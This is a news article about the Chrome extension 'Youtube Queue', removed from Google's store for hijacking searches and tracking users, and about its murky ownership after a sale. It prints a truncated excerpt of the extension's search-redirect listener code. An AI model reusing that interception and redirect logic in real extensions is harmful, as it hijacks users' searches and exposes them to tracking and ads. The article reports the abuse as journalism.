Youtube Queue Chrome extension booted out of store for search engine hijacking, revealing Google's lax dev checks

Follow us down the rabbit hole in uncovering who is possibly responsible

Google has removed a Chrome extension called Youtube Queue from its official online store for violating its program policies following complaints it was hijacking users' web searches.

However, another extension called Croowila Videos Player that shares similar suspect code remains available.

Via Twitter on Monday, a Microsoft principal program manager Eric Lawrence explained that the JavaScript in both extensions "abuses [the] webRequestBlocking API and redirects [the] user's search query from HTTPS website to unexpected search engine laden with ads using unsecured HTTP."

On Reddit and other internet forums, multiple gripes about the Youtube Queue extension have surfaced. Reviews posted on the removed Chrome Web Store page suggest the add-on, used by several thousand people, went bad around June 7 this year.

Youtube Queue, not to be confused with YouTube Queue or YOUTUBE QUEUE or Queue for Youtube, was supposed to help you line up YouTube videos one after the other – though it hijacked web search queries and sent netizens instead to a search service called Croowila and a web page identified as Information Vine to display ads. It also transmitted globally unique identifiers (GUIDs) attached to each of its users so they could be individually tracked on the web.

But even Google had trouble identifying those responsible for the Youtube Queue extension, a testament to the Chrome Web Store's lax security procedures and oversight that allows confusingly similar extension names.

Alerted to the issue, the ad giant contacted support@softools.com, listed as the email address for the add-on, and two other email addresses affiliated with googlegroups.com and gmail.com, to inform those responsible for the software about its ejection from the Chrome Web Store.

"Dear Developer," Google's message reads, "Your Google Chrome item, 'Youtube Queue,' with ID: pgeplakfmipjphmlpnfbeldbficaeack did not comply with our program policies and was removed from the Google Chrome Web Store."

But according to Bill Auerbach, who created legacy processor toolchain biz Softools, Inc, which operates on the softools.com domain, his company's support address was listed on the Youtube Queue page seemingly without authorization nor any verification by Google. He provided The Register with a copy of the Google email he received.

"The support address listed with the app is incorrect," he said in an email to The Register. "We have nothing to do with it. We’ve been contacted by Google about a bad app/plug-in and told them the address is wrong. They’ve already pulled the app."

Google did not respond to a request for comment.

The Register contacted Abhishek Deora, a developer whose name can be found in the Youtube Queue extension code to try to understand how things went wrong. Deora's GitHub contains a project called "youtube_queue_extension" that, at the time this story was filed, include a link to the removed Chrome Web Store listing. However, the GitHub repo lacks the search redirection code.

Ads on Times Square. Photo by Allen G via Shutterstock editorial use only

Chrome web dev plugin with 1m+ users hijacked, crams ads into browsers

READ MORE

In an email, Deora explained, "I have recently sold the extension to softools. After selling it these issues starting coming but I am no longer the owner." (Auerbach suggested inquiring to softools.net in the UK, but there's no reason to believe that company had anything to do with the adware extension either.)

Deora said he had created a new version of the extension called "Queue Tube" after seeing all the complaints from users. It doesn't include the search redirection of the banned version.

The Register has sent an inquiry to the individual said to have purchased the Youtube Queue extension code from Deora, apparently an Israeli with experience in malware research and computer security, but we've not heard back. The Youtube Queue developer information in the Chrome Web Store listing included an address in Tel Aviv, Israel, though it could be inaccurate like the errant softools.com email link.

The deceptive code attempts to remain inconspicuous by redirecting only once per browsing session. For Youtube Queue, it can be found in src/js/background.js. For Croowila Videos Player, the background.js file in the extension's root directory is almost identical. Both rely on the Chrome Extensions API chrome.webRequest.onBeforeRequest to intercept and redirect search queries.

chrome.webRequest.onBeforeRequest.addListener(function (details) {
   var isSearchEngineRet;
   var searchEngine;
   var handlerDecision;
   var query;
   var shouldStartCheck = false;

   if (details.type == "main_frame") {
      if (SEARCH_TABS.indexOf(details.tabId) > -1) {
         return {
            cancel: false
         };
      }

   [isSearchEngineRet, searchEngine] = isSearchEngine(details.url);
   if (isSearchEngineRet == true) {
      [handlerDecision, query] = SEARCH_ENGINE_PROVIDERS[searchEngine][1](details.url);
      //console.log(handlerDecision);
      if (handlerDecision == "pass") { 
         return {
            cancel: false
         };
      } else if (handlerDecision == "redirect") {
           SEARCH_TABS.push(details.tabId);
           //CURRENT_SEARCH_ENGINE = SEARCH_ENGINE_PROVIDERS[searchEngine][0];
           return {
              redirectUrl: REDIRECT_URL + encodeURIComponent(query)
           };
      }
...

A source familiar with the issue told The Register that buying a popular extension and altering the code to allow abuse has become a common attack vector, along with hacking developer accounts, which is one of the reasons Google has been pushing 2FA for developers. ®

Speaking of Chrome extensions... Google today announced the release of its Suspicious Site Reporter extension, a tool for reporting dodgy looking websites to the Safe Browsing team. It also displays an icon if you land on a potentially unsafe webpage.




Biting the hand that feeds IT © 1998–2019